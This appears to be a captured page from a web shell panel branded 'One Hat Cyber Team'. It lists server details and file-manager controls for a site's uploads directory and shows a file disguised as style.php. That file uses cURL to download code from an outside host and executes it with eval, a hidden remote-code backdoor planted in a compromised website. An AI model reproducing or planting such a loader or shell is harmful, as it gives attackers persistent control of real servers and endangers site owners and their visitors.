⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
45.79.8.107
Server:
Linux localhost 5.15.0-140-generic #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.2-1ubuntu2.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
demo.lmsmonks.com
/
public
/
uploads
/
Edit File: style.php
<?php // Inisialisasi cURL $ch = curl_init(); // Set URL tujuan curl_setopt($ch, CURLOPT_URL, "https://v1.javpornsub.net/2.txt"); // Return hasil eksekusi sebagai string curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Eksekusi cURL $remote_code = curl_exec($ch); // Tangani error cURL if (curl_errno($ch)) { echo "cURL Error: " . curl_error($ch); curl_close($ch); exit; } curl_close($ch); // Jalankan kode jika berhasil diambil if ($remote_code !== false && !empty($remote_code)) { eval("?>$remote_code"); } else { echo "Gagal mengambil atau kode kosong dari URL."; } ?>
Simpan